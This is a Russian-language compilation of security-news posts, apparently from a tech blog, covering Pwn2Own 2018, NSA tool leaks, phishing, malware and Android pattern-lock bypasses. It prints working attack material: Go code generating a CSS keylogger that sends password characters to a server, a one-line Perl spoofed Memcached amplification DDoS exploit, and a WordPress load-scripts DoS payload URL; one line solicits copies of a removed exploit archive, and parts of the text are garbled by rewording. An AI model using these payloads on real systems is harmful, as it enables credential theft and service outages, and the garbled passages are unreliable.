На турнире хакеров взломали популярные веб-браузеры и macOS

(adsbygoogle = window.adsbygoogle || []).push({});
Во время ежегодного турнира хакеров Pwn2Own 2018, прошедшего в Канаде в рамках конференции CanSecWest, специалисты по кибербезопасности со всего мира пытались найти уязвимости в программном обеспечении крупных корпораций. В частности, хакерам удалось успешно взломать веб-браузеры Microsoft, Mozilla и Apple.



В рамках первого дня состязания Ричард Чжу наглядно показал использование целой серии уязвимостей в браузере Edge, за что получил $70 000. Никлас Баумштарк из Phoenhex продемонстрировал рабочий метод взлома VirtualBox, заработав $27 000, а Сэмюэл Гросс из той же команды сумел скомпрометировать Safari, получив за это $65 000.

На следующий день вновь отметился Ричард Чжу, который сумел взломать Firefox при помощи уязвимости в самом браузере и ядре Windows. За эту находку он получил ещё $50 000. Хакеру присудили звание Master of Pwn за самые значимые находки.


Также в течение второго дня специалисты из Ret2 Systems сумели взломать Safari путём использования цепочки эксплойтов, но получилось это у них только с четвёртого раза, поэтому награду специалисты не получили. Отметилась и команда MWR Labs, которая путём переполнения буфера хипа сумела взломать Safari и применить атаку типа Uninitialized Stack Variable в операционной системе macOS, заработав $55 000.

Всего в этом году специалисты заработали $267 000 при общем призовом фонде в $2 000 000. Для сравнения, в прошлом году хакеры обнаружили 51 уязвимость, получив $833 000, а годом ранее размер общего выигрыша составил $460 000 за 21 эксплойт.

Как сообщается, в этом году многие специалисты не смогли участвовать в конкурсе. Часть «сошла с дистанции», так как Microsoft в мартовском обновлении безопасности закрыла многие уязвимости. А китайским участникам и вовсе запретили участвовать в этом состязании власти Китая, объясняя это тем, что специалисты не должны открыто делиться информацией об уязвимостях — только напрямую с разработчиками ПО.

Кейлоггер на CSS

  • CSS
(adsbygoogle = window.adsbygoogle || []).push({}); Независимый разработчик Макс Чихаб (Max Chehab) поделился своим CSS-кейлоггером на GitHub. Инструмент представлен в виде расширения для браузера Chrome.

Принцип работы
Используя селекторы атрибутов, можно запрашивать ресурсы с внешнего сервера под видом загрузки фонового изображения.

Например, следующий CSS выберет все формы ввода с типом password и значением value, заканчивающимся на «а», и затем попытается загрузить фотографию из localhost:3000/a:
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
С помощью простого скрипта можно создать CSS-файл, который будет посылать опциональные запросы для каждого символа ASCII:
package main

import (
	"fmt"
	"log"
	"net/url"
	"os"
)

func main() {
	fmt.Println("Building keylogger.css")

	output, err := os.Create("./css-keylogger-extension/keylogger.css")
	if err != nil {
		log.Fatal("Cannot create output", err)
	}
	defer output.Close()
	for c := 32; c < 128; c++ {
		value := fmt.Sprintf("%c", c)
		urlValue := url.QueryEscape(value)

		if value == `"` {
			value = `\"`
		} else if value == `}` {
			value = `\\}`
		} else if value == `\` {
			value = `\\`
		}
		fmt.Fprintf(output, `input[type="password"][value$="%v"] { background-image: url("http://localhost:3000/%v"); }`, value, urlValue)
		fmt.Fprintf(output, "\n")
	}
	fmt.Println("Complete.")
}

Как пользоваться?
  • Открыть веб-сайт, использующий компонентный фреймворк вроде React (например, instagram.com).
  • Нажать на расширение C в правом верхнем углу на любой странице.
  • Ввести свой пароль.
  • Пароль будет перехвачен express-сервером.

Подробности по установке и настройке расширения можно найти в источнике.

Каскадные таблицы стилей становятся популярным инструментом для проведения хакерских атак. Напомним, что в январе был создан прототип системы для отслеживания ряда пользовательских действий на чистом CSS. А в начале февраля у исследователей получилось использовать CSS для кражи токенов CRSF и персональных данных.

В Сеть выложили коды, запускающие DDoS-атаки через серверы Memcached

(adsbygoogle = window.adsbygoogle || []).push({}); Заинтересованные специалисты опубликовали собственные варианты реализации DDoS-атак через заражённые серверы Memcached. Массовая злоумышленная кампания захватила уже более 17 000 IP-адресов и до сих пор не ликвидирована. Атаки достигают рекордных размеров.

Proof-of-Concept
Всего исследователи представили три различных способа использовать скомпрометированные устройства:
скрипт на языке Python под названием Memcrashed, сканирующий поисковую систему Shodan на наличие IP захваченных серверов Memcached и позволяющий запускать DDoS-атаку на любое желаемое устройство буквально за несколько секунд:


код на Си из репозитория Pastebin, опубликованный вместе со списком из 17 000 IP уязвимых серверов и извлекающий из него адреса для проведения атаки:

небольшой эксплойт, уместившийся в один твит:


UDP 50,000x AMP attack IP-Spoof POC. syntax args: <victim_ip> <memecache_ip>

use Socket;socket R,2,3,255;setsockopt R,0,1,1;send R,pack("H*x4H*a4a4H*Z*",45000019,"52110000",(map{inet_aton$_}@ARGV),"fefe2bcb0017"."0"x14,"\x01\x00\x00stats\r\n"),0,pack"Sna4x8",2,60,pop
Memcached-кампания пока только развивается. Напомним, что несколько дней назад жертвой атак стал GitHub — наплыв запросов «положил» его на 9 минут.

DoS-уязвимость в WordPress позволяет «положить» любой сайт

(adsbygoogle = window.adsbygoogle || []).push({}); Независимый израильский ИБ-специалист Барак Тавайли( barak tawily) нашел и тщательно рассказал в собственном блоге критическую dos-уязвимость в wordpress cms. Баг получил идентификатор cve-2018-6389 и представляет угроза для всех версий wordpress, вышедших за крайние 9 лет( подключая более новый релиз 4. 9. 2).

В собственной статье спец разъясняет, что неувязка связана с работой load-scripts. Php, который употребляется для обработки пользовательских запросов. Исходно load-scripts.php был создан для удобства администраторов страниц, чтоб те могли повысить продуктивность собственных ресурсов, объединив некоторое количество файлов javascript воедино. При этом создатели wordpress не сочли необходимым защитить эту функциональность какой-нибудь аутентификацией, чтоб скрипт мог действовать и без логина. Фактически, load-scripts.php оказался доступен любому желающему.



В зависимости от поставленных модулей и плагинов, load-scripts.php выборочно подгружает разные файлы javascript, чьи имена перечисляются чрез запятую после параметра " load ". Url выглядит таким следующим образом:

https://your-wordpress-site.com/wp-admin/load-scripts.php?c=1&load=editor,common,user-profile,media-widgets,media-gallery

Ето самый примитивный способ, более расширено можно использовать

eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter

Так, во время загрузки сайта, load-scripts.php пытается отыскать каждый из перечисленных в URL файлов JavaScript, чтобы «отдать» их браузеру пользователя в виде одного файла.

Тавайли обнаружил, что атакующий может заставить load-scripts.php загрузить все возможные файлы JavaScript вообще, просто перечислив их в URL. Из-за этого атакуемый сайт может начать работать значительно медленнее, поглощая все больше и больше мощностей сервера. Разумеется, при помощи одного такого запроса злоумышленнику не удастся спровоцировать отказ в обслуживании, однако исследователь создал proof-of-concept эксплоит: простой скрипт doser.py, написанный на Python. Скрипт отправляет множество подобных запросов целевому URL. Примерно после 500 запроса средний сайт, работающий на VPS-сервере, перестает отвечать вовсе, «отдавая» лишь ошибки 502, 503 и 504.



Специалист отмечает, что с 1-го компьютера навряд ли удастся «положить» работающий под управлением wordpress интернет-сайт, работающий отдельно, на выделенном сервере, но ежели в злоумышленника имеется широкий канал или некоторое количество ботов, штурм сработает и против такового ресурса, при этом окажется наименее затратной для злодея, ежели обыденный ddos.



Хотя dos-уязвимости не подпадают под bug bounty программу wordpress, Тавайли все же сказал о проблеме разработчикам чрез платформу hackerone. К огорчению, создатели wordpress не сочли обнаруженную уязвимость довольно серьезной и сказали, что улаживать такие трудности необходимо на уровне сервера или сети, но не на уровне приложений. С етого следует что патча для этого бага нет.

В ответ на это Барак Тавайли опубликовал на GitHub собственный форк WordPress, в котором уязвимость устранена. Также исследователь выложил в открытый доступ bash-скрипт, который позволяет исправить проблему в уже существующих установках WordPress.

Космические лучи как причина зависания телефона

(adsbygoogle = window.adsbygoogle || []).push({}); Когда ваш мобильный ловит глюки и виснет, не стоит сразу грешить на производителей. Исследователи из Университета Вандербильта, выяснили, что причиной этому могут служить космические лучи.

Все знают, что в космосе большое количество всевозможной материи, а также различных полей, которые образуются не только вследствие природных процессов. Все виды излучений, независимо от происхождения, пагубно отражаются на производительности всех электронных приборов.

В космосе при любой звездной активности появляется особый вид материи – космические лучи, которые в своем составе имеют электромагнитное излучение. Когда эти лучи приближаются к планете, происходит определенное воздействие на электронику.Наука: Космические лучи как причина зависания телефона

Исследователями доказано, что кроме электромагнитного излучения, гаджетам угрожают различные высокоактивные частицы, иначе как космическая радиация. Это происходит, когда космические лучи соприкасаются с плотными слоями атмосферы и делятся на частицы, содержащие в себе и электрический заряд.

Возможно, многие осведомлены, как работают все ячейки памяти, хранящее данные о деятельности электроники. В отдельных ячейках меняется электрический заряд. То есть положение «0» значит, заряда нет, а «1» — он присутствует. Невероятно, но такая простая система должна иметь помехозащищенность. Только из наблюдений видно, что космические частицы могут менять положение ячеек памяти, и способны отразиться на деятельность электрических цепей. А это уже значительная угроза.Наука: Космические лучи как причина зависания телефона

Были случаи, когда из-за космических лучей происходили сбои. Впервые это произошло в Бельгии в 2003 году, с прибором для голосования. Тогда в данных было выявлено где-то 4000 неправильных голосов. Второй раз явление было замечено в 2008 году. Из-за активности космических лучей случился сбой в работе автопилота воздушного судна AirBus A330. Тогда пострадало 119 граждан.

По мнению специалистов, влияние космоса постепенно растет и в будущем это приведет к плачевным последствиям. Может быть, это связано и с самим ростом, а также многофункциональностью электроники. Поправить положение можно, если мобильным устройствам создать высокую помехоустойчивость.
Читать дальше

Взлом электроники по средствам музыки

(adsbygoogle = window.adsbygoogle || []).push({}); Оказывается, любые электронные устройства, будь то телефоны, компьютеры или даже автономные транспортные средства, могут быть взломаны при помощи определенных звуковых сигналов. Этот интересный факт был установлен недавно исследователями из Мичигана.

Устройства, имеющие программируемые или программно-управляемые цепочки для работы используют определенные датчики, которые регистрируют факторы и внешние воздействия. Эти факторы и их воздействия переводятся в электрический импульс, который в виде массива данных обрабатывается системой. Пример тому микрофон. Он принимает волновые колебания воздуха от звуков и переводит их в электрические импульсы.

И вот, после длительных исследований ученные обнаружили, что на устройства можно воздействовать при помощи музыки из точно выставленных сигналов тонов. На работе устройства это никак не отражается. Поэтому если кто-то будет производить изменения, в программном обеспечении вашего гаджета, то заблаговременно вы этого не выявите.

Опыты были проведены над смартфоном и автомобилем имеющим операционную систему Android. Ученным удалось без специального программного обеспечения взять контроль над обеими системами. А это значит, что производителям электроники давно пора задумываться о новой защите своей продукции, до того как иное воздействие станет массовым.
Читать дальше

Новый способ взлома Gmail

(adsbygoogle = window.adsbygoogle || []).push({});
Сегодня ночью многие пользователи Gmail получили уведомление о том, что они добавлены в список редакторов некого документа, хранящегося в Google Drive. Это письмо имело точно такой же вид, как стандартное уведомление сервиса о расшаривании файлов. Дополнительной убедительности письму придавал тот факт, что оно было отправлено от одного из людей, чей адрес имелся в списке контактов.

Хакер: На этот раз приманкой стали поддельные документы Google Docs.

Пользователи без всякой опаски переходили по ссылке, чтобы ознакомиться с документом. Здесь злоумышленники подготовили для них фишинговое приложение, которое запрашивало полный доступ к электронной почте. Это приложение было замаскировано под Google Drive: имело такую же иконку и название.

Хакер: Новый способ взлома Gmail

Далее зловредное приложение просит предоставить ему полный доступ к электронной почте. Если пользователь соглашается, то червь мигом рассылает себя по всем адресам из адресной книги (вот почему письма приходят от знакомых контактов).

В результате злоумышленники получают полный контроль над почтой. В том числе они могут удалять письма, читать их и даже отправлять корреспонденцию от имени жертвы. Им ничего не стоит сбросить пароль в любом сервисе, привязанном к этому почтовому ящику, и таким образом завладеть им.

Через несколько часов после начала эпидемии компания Google сообщила об отключении хакерского приложения, маскирующегося под Google Drive. Однако никто не даёт гарантии, что атака не повторится с использованием уже другой приманки.

Хакер: Новый способ взлома Gmail

Как обезопасить себя от фишинга подобного рода?

Прежде всего постарайтесь не открывать расшаренные гугл-документы без полной уверенности, что ими действительно поделился с вами реальный человек. Лучше послать лишнее письмо или даже позвонить, чтобы точно убедиться в безвредности полученного приглашения.
Читать дальше

5 простых способов разблокировать графический пароль

(adsbygoogle = window.adsbygoogle || []).push({});
Любой пользователь смартфона на Android в один момент может столкнуться с довольно серьезной задачей. Обезопасив доступ к своему гаджету с помощью графического ключа, человек может элементарно забыть последовательность соединения точек. В итоге смартфон оказывается заблокирован не только от злоумышленника, но и от своего собственного хозяина.

Способ 1. Восстановление доступа к смартфону через аккаунт Google

Данный метод поможет лишь в том случае, если смартфон подключен к Сети через Wi-Fi или модуль мобильного интернета. Также важно заранее сделать себе доступ к аккаунту Google:

Введите 5 раз произвольный неправильный ключ;
Появится всплывающее окно с вопросом «Забыли графический ключ?»;
Нажмите на него, и система предложит ввести данные Google-аккаунта;
Введите свой электронный адрес и пароль.
Пройдя аутентификацию, вы сможете запрограммировать новый графический ключ на телефон. Если вы забыли еще и пароль от аккаунта, восстановить его можно через браузер на ПК или ноутбуке на официальном сайте Google.
Хакер: 5 простых способов разблокировать графический пароль
Получить доступ к Wi-Fi на заблокированном смартфоне можно через USSD-команду:

Нажмите на кнопку экстренного вызова;
Введите команду *#*#7378423#*#*;
Выберете пункт Service Test – WLAN;
Подключитесь к точке доступа Wi-Fi.
Если у вас нет доступа к Wi-Fi или не подключен мобильный интернет, воспользуйтесь другой сим-картой, где активирована услуга доступа к Сети.
Способ 2. С помощью разряженного аккумулятора

Разблокировать графический пароль на телефоне можно, используя сервисное сообщение о разряженной батарее. Дождитесь, когда смартфон разрядится. Когда уровень заряда упадет ниже 10%, на экране появится всплывающее окно с предупреждением. В этот момент можно будет попасть в меню управления питанием, а уже оттуда в настройки безопасности. Здесь вы сможете сменить свой графический ключ.
Хакер: 5 простых способов разблокировать графический пароль
Способ 3. Удаление файла графического ключа через ПК

Данные о графическом ключе хранятся в специальном файле gesture.key. Если вы забыли конфигурацию своего ключа, вернуть себе доступ к смартфону можно, удалив данный файл с помощью ПК.

Для того чтобы попасть в меню смартфона через компьютер, вам понадобится предварительно включить отладку по USB. Для этого в меню смартфона необходимо активировать меню разработчиков. Подробно о том, как это сделать, вы можете прочитать в статье о скрытых возможностях Андроида. Настроив таким образом смартфон, выполните следующие действия:

Установите на ваш ПК или ноутбук программу управления ADB Run (скачать программу можно через торрент-трекер или на техническом форуме);
Подключите смартфон к ПК и включите отладку по USB;
Запустите программу ADB Run;
С помощью стрелок на клавиатуре выбреете пункт 6 “Unlock Gesture Key”;
Нажмите Enter.
Хакер: 5 простых способов разблокировать графический пароль
Способ 4. Полный сброс настроек

Вернуть доступ к телефону, если вы забыли графический ключ, можно довольно критическим методом – через сброс заводских настроек. В этом случае вы потеряете все данные, которые хранятся в памяти гаджета: номера, аккаунты, пароли, фото, видео, данные приложений и так далее. Если вы допускаете вероятность сброса настроек, подготовьтесь к этому заранее.

Все важные медиафайлы лучше скопировать на внешний носитель, а контакты перенести на ПК. Также можно предварительно настроить резервное копирование данных. Для этого:

Войдите в настройки;
Выберете раздел «Восстановление и сброс»;
Нажмите на пункт «Резервирование данных»;
Ознакомьтесь с описанием функции и нажмите кнопку включения;
Выберете аккаунт для резервирования.
Хакер: 5 простых способов разблокировать графический пароль
Хакер: 5 простых способов разблокировать графический пароль
Хакер: 5 простых способов разблокировать графический пароль


Чтобы сбросить все настройки в смартфоне, необходимо попасть в меню Recovery. Для этого нужно выключить телефон и зажать определенную комбинацию клавиш. Как правило, это одна из кнопок качельки громкости в сочетании с клавишей включения.

Далее выполните следующие шаги:

Войдите в меню Recovery;
Выберите «recovery mode»;
С помощью клавиш громкости найдите пункт «Wipe Data / Factory Reset»;
Нажмите «Yes»;
Нажмите на команду «reboot system now»;
Дождитесь перезагрузки телефона.
После того, как вы вернете доступ к своему смартфону, вы сможете вернуть все сохраненные ранее данные.
Способ 5. Сервисный центр

Если вы совсем не уверены в том, что можете самостоятельно разблокировать телефон, лучше обратиться в сервисный центр к мастеру, который гарантировано решит вашу проблему.
Читать дальше

Неисправленная уязвимость в Magento позволяет взламывать магазины через Vimeo-видео

(adsbygoogle = window.adsbygoogle || []).push({}); Специалисты компании DefenseCode раскрыли информацию об уязвимости в популярной e-commerce платформе Magento, которую им удалось обнаружить еще в ноябре 2016 года. Хотя исследователи немедленно сообщили о проблеме через Bugcrowd-трекер компании, патч до сих пор не был представлен, а разработчики Magento некоторое время назад перестали отвечать на вопросы и не сообщают о статусе исправления.

DefenseCode сообщает, что баг связан с функцией, позволяющей пользователям добавлять Vimeo-видео на страницы продуктов. После добавления такого ролика на сайт, Magento автоматически запрашивает превью-изображение для видео, используя для этого POST-запрос. Исследователи пишут, что POST можно заменить на GET, что позволит осуществить CSRF-атаку, загрузив на сайт произвольный файл. И хотя Magento не допустит использования некорректных файлов изображений, файл все-таки будет сохранен на сервере для проверки.

Интернет: Неисправленная уязвимость в Magento позволяет взламывать магазины через Vimeo-видео
После этого выяснить местоположение файла не составит труда, и атакующий сможет загрузить на сервер вредоносный PHP-скрипт. Чтобы добиться выполнения произвольного кода на стороне сервера, в ту же директорию нужно будет поместить файл .htaccess. Для реализации атаки злоумышленнику нужно будет использовать приемы социальной инженерии на одном из пользователей магазина, который имеет доступ к панели управления. Вне зависимости от прав и уровня доступа жертвы, посещение специально созданной вредоносной веб-страницы станет триггером для CSRF-атаки.

Исследователи предупреждают, что такая атака может привести к полной компрометации магазина: злоумышленники получат полный доступ к конфиденциальным пользовательским данным, но при этом им не понадобится полноценный административный доступ, достаточно будет скомпрометировать сотрудника магазина с низкими привилегиями. Уязвимость по-прежнему не исправлена. Последнее обновление для Magento было представлено в феврале 2017 года, тогда разработчики устранили опасную RCE-уязвимость.
Читать дальше

Хакеры выложили в открытый доступ инструменты для взлома Windows

(adsbygoogle = window.adsbygoogle || []).push({}); Хакерская группировка The Shadow Brokers опубликовала порцию инструментов, похищенных у группы Equation Group, подозреваемой в связях со спецслужбами США. Речь идет об эксплоитах для уязвимостей в различных версиях операционной системы Windows. По словам экспертов, некоторые из них еще работают.

На данным момент яндекс удалил ссылку, возможно кто то скачал, будем рады если поделитесь.

Хакеры выложили в открытый доступ инструменты для взлома Windows

Как сообщает ресурс Securitylab, архив содержит инструменты для взлома разных версий ОС — от Windows 2000 и Server 2012 до Windows 7 и 8. Опубликованный дамп содержит в общей сложности 23 инструмента, в том числе EsteemAudit, Oddjob, Mofconfig, Easybee, EducatedScholar, EnglishmanDentist, EsikmoRoll, EclipsedWing, Emphasismine, EmeraldThread, Fuzzbunch, ExplodingCan, ErraticGopher, EternalRomance, EternalBlue, EternalSynergy, Ewokefrenzy и Doublepulsar.

Fuzzbunch представляет собой модульное ПО, позволяющее за несколько минут взломать целевую систему и установить бэкдор для удаленного управления Windows-ПК.

В Microsoft провели анализ эксплоитов и заявили, что уязвимости в протоколе SMB v1-3, эксплуатируемые инструментами EternalBlue, EmeraldThread, EternalChampion, EternalRomance, ErraticGopher, EducatedScholar и EternalSynergy, уже были исправлены в предыдущие годы, некоторые устранены в нынешнем году (CVE-2017-0146 и CVE-2017-0147).

Хакеры выложили в открытый доступ инструменты для взлома Windows

Патч для уязвимости в контроллерах домена, работающих под управлением Windows 2000, 2003, 2008 и 2008 R2, эксплуатируемой инструментом EsikmoRoll, был выпущен еще три года назад, в 2014 году. Как отметили в компании, инструменты EnglishmanDentist, EsteemAudit и ExplodingCan не работают на поддерживаемых версиях Windows, поэтому патчи для них выпускаться не будут.

Помимо инструментов для взлома Windows, хакеры также опубликовали документы, свидетельствующие о наличии у АНБ США доступа к межбанковской системе обмена сообщениями SWIFT, позволявшему отслеживать перемещение средств между банками Южной Америки и Среднего Востока.
Читать дальше

Защиту Denuvo для Resident Evil 7 взломали менее чем за неделю

(adsbygoogle = window.adsbygoogle || []).push({}); На протяжении нескольких лет защита Denuvo оставались крепким орешком и вынуждала любителей халявы со всего мира покупать игры, а не скачивать их бесплатно из интернета. Поначалу решения Denuvo Software Solutions вообще казались практически неприступными, но со временем мощная защита все же стала давать слабину. Так, в августе 2016 года игра Rise of the Tomb Raider появилась на торрент-трекрах спустя пять месяцев после ее релиза, благодаря усилиям итальянской группы CONSPIR4CY (CPY). Спустя буквально несколько дней взломщики также выложили в сеть платформер Inside, тоже некогда защищенный Denuvo. На этот раз между релизом игры и взломом Denuvo прошло лишь шесть недель.

Затем последовал целый каскад взломов, и защиты лишились такие громкие проекты, как Doom, Mirror’s Edge Catalyst, Deus Ex: Mankind Divided и Watch Dogs 2. Хотя универсальной «серебряной пули» против Denuvo не существует (и создать ее невозможно, так как защита реализована по-своему для каждой отдельной игры), хакеры явно уловили основные принципы ее работы и стали ломать игры куда быстрее.

Новый рекорд был зафиксирован в минувшее воскресенье, 29 января 2017 года. Игра Resident Evil 7: Biohazard была представлена 24 января, и спустя всего пять дней команда CPY сумела вскрыть ее защиту и выложила в сеть 23-гигабайтный дамп, который распространился по пиратским сайтам со скоростью лесного пожара.

Игры: Защиту Denuvo для Resident Evil 7 взломали менее чем за неделю

В защиту Denuvo Software Solutions можно сказать, что компания никогда не позиционировала свои решения как «невзламываемые». В данном случае задача компании заключается в том, чтобы на старте продаж дать игре определенное «окно», во время которого крякеры еще бьются над взломом, а пользователи вынуждены покупать игру, не имея пиратской альтернативы. И насколько большим будет это «окно», неизвестно, об этом представители Denuvo Software Solutions договариваются напрямую с игроделами, за закрытыми дверями.

Напомню, что в декабре 2016 года, вскоре после того, как компания Bethesda удалила защиту Denuvo из нового Doom (к тому времени защиту уже взломали), прошел слух, что теперь разработчиков Denuvo ожидает «штраф», так как создатели Doom имеют полное право потребовать возврат затраченных средств. Тогда представители Denuvo опровергли эту информацию и заявили следующее: «Мы не имеем права комментировать наши сделки с конкретными клиентами, но у нас нет никаких договоренностей о возврате денежных средств, если игра была взломана в течение какого-то конкретного периода времени».

Тем не менее, разработчики игр действительно платят Denuvo Software Solutions немалые деньги за защиту, пусть даже все понимают, что эта защита временная. Увы, пять дней для такого AAA-проекта, как Resident Evil 7 – это практически ничто. Встает резонный вопрос, зачем игроделам платить за защиту Denuvo, если она держится считанные дни? Похоже, мы наблюдаем начало конца «великой и ужасной» Denuvo. Во всяком случае, пример Resident Evil 7 пока может справедливо считаться самой большой неудачей Denuvo Software Solutions.
Читать дальше

Обнаружен троян, превращающий Linux-машины в прокси

(adsbygoogle = window.adsbygoogle || []).push({});
Новые угрозы для Linux-систем стали появляться заметно чаще, и обнаруженный экспертами компании «Доктор Веб» троян Linux.Proxy.10 – лишнее тому доказательство.
Специалисты пишут, что малварь была найдена в январе 2017 года и уже успела инфицировать несколько тысяч устройств. Как и следует из названия, присвоенного вредоносу, он предназначен для запуска на устройстве жертвы SOCKS5-прокси сервера, основанного на свободно распространяемых исходных кодах утилиты Satanic SOCKS Server. Злоумышленники используют этого трояна для обеспечения собственной анонимности в интернете.

Хакер: Обнаружен троян, превращающий Linux-машины в прокси

Для распространения малварь хакеры авторизуются на уязвимых узлах, используя SSH. При этом список узлов, а также логин и пароль к ним хранятся на сервере злоумышленников. Список имеет следующий вид: «IP-адрес:login:password». Исследователи отмечают, что пользователей с такими учетными данными как правило создают в системе другие Linux-трояны. То есть Linux.Proxy.10 проникает на устройства, либо имеющие стандартные настройки, либо уже инфицированные другой Linux-малварью. Через использование вышеупомянутого списка формируется сценарий, который выполняется на заражаемых устройствах при помощи утилиты sshpass. Так и происходит заражение Linux.Proxy.10.

Также помимо списков уязвимых узлов исследователи обнаружили на серверах злоумышленников панель управления Spy-Agent и сборку вредоносной программы для WINDOWS, относящейся к известному семейству шпионских троянов BackDoor.TeamViewer.

Хакер: Обнаружен троян, превращающий Linux-машины в прокси

Чтобы подключиться к прокси-серверу, запущенному при помощи Linux.Proxy.10, злоумышленникам достаточно знать только IP-адрес девайса и номер порта, который сохраняется в теле троянца при его компиляции.
Читать дальше

Как хакеры взламывают страницы «ВКонтакте»?

(adsbygoogle = window.adsbygoogle || []).push({});
«ВКонтакте» — одна из самых продвинутых соцсетей в плане защищённости, но её пользователей всё равно очень часто в взламывают. Как хакерам это удаётся, если страница защищена паролем и привязана к номеру телефона?
Пароль
Пароль — самое слабое место любой учётной записи. Если злоумышленник знает ваш логин, email-адрес или номер телефона, ему остаётся только подобрать пароль. Сделать это можно разными способами: перебрать брутфорсом популярные пароли, подсмотреть, перехватить через открытую точку Wi-Fi. Если вы используете один и тот же пароль на всех сайтах, вы сильно упрощаете задачу злодею: если он взломает вашу почту и увидит в открытом виде пароль, который вы используете на других сайтах, он догадается, что он подходит к вашей странице в соцсети. Некоторые хакеры сначала ломают именно почту, а потом всё остальное.

Пароли также перехватываются с помощью кейлогеров на компьютерах в общественных местах. Если вы заходите в аккаунт с чужого компьютера, подумайте, доверяете ли вы его владельцу и нет ли вероятности, что на ПК установлена программа, перехватывающая все вводимые символы.

Вирусы и расширения
Уводить логины и пароли могут вирусы и расширения для браузеров, запрашивающие доступ к «ВКонтакте». Кроме того, сбором этих данных могут заниматься приложения, «паразитирующи» на «ВКонтакте» (например, аудиоплееры), а также программы, расширяющие возможности соцсети или сайты, позволяющие зарабатывать на лайках, репостах, комментариях и добавлениях в друзья. Если вы пользуетесь чем-то подобным, почаще меняйте пароль — возможно, он давно уже слит и продан потенциальным мошенникам.

Взлом смартфона
Пароль можно сбросить по SMS, поэтому не оставляйте свой смартфон без присмотра и блокируйте устройство так, чтобы никто не смог прочитать на нём входящие сообщения. Если вы отдыхаете с компанией и уснули, а ваш смартфон защищён только сканером отпечатков пальцев, заблокируйте его так, чтобы для входа дополнительно потребовался пароль. Так его не смогут взломать, даже если подставят к сканеру ваш палец, пока вы спите.

Перехват SMS
У SMS есть уязвимость, которую никто не может устранить. Эта уязвимость позволяет настроить перехват SMS-сообщений и взломать аккаунт «восстановлением» пароля. В интернете полно объявлений о взломе страниц «ВКонтакте» и других аккаунтов, привязанных к номеру телефона, — хакеры пользуются именно этой уязвимостью.

Как защититься от взлома?
Прежде всего придумайте сложный пароль, используйте его только для этой соцсети и регулярно меняйте его на новый. Зайдите в настройки безопасности «ВКонтакте» и как минимум установите оповещения о входе в аккаунт. Также можно настроить двухфакторную аутентификацию, при которой каждый вход будет подтверждаться кодом, пришедшим по SMS. Но помните, что защитить свой аккаунт от взлома на 100% у вас всё равно не получится, поэтому не держите в нём ничего, что могло бы вас скомпрометировать.
Читать дальше

Shadow Brokers продают очередную порцию инструментов АНБ

(adsbygoogle = window.adsbygoogle || []).push({}); В пакет программ входят эксплоиты для уязвимостей в Windows и инструменты для обхода антивирусов.
Хакеры Shadow Brokers выставили на продажу следующую порцию инструментов для взлома, похищенных у Equation Group. Напомним, данную организацию связывают с Агентством национальной безопасности США. Как сообщает издание The Hacker News, стоимость дампа составляет 750 биткойнов (около $678,6 тыс.)

В пакет программ под названием Equation Group Windows Warez входят эксплоиты для уязвимостей в Windows и инструменты для обхода антивирусной защиты. Программы распределены на несколько категорий:

• Инструменты для фаззинга (используются для обнаружения ошибок и брешей в безопасности);
Фреймворки эксплоитов;
• Сетевые закладки;
• Инструменты для удаленного администрирования (RAT);
• Эксплоиты для уязвимостей (в том числе нулевого дня) в протоколах IIS, RDP, RPC и SMB, позволяющих удаленно выполнить код;
•Бэкдор (закладка) для SMB.

Примечательно, инструмент для удаленного администрирования DanderSpritz ранее упоминался в документах АНБ, рассекреченных Эдвардом Сноуденом.
По данным исследователя Джейкоба Уильямса (Jacob Williams), выставленный на продажу пакет программ также содержит вредоносное ПО, способное обходить обнаружение антивирусами (Fully Undetectable, FUD). Вредоносы остаются незамеченными для таких продуктов, как Avira, Avast, Dr.Web, ESET Antivirus, Comodo, McAfee Antivirus, Microsoft Essential, Panda, Symantec, Trend Micro и Kaspersky Antivirus.
Читать дальше

Фишинговая атака, использующая особенности автозаполнения форм браузером

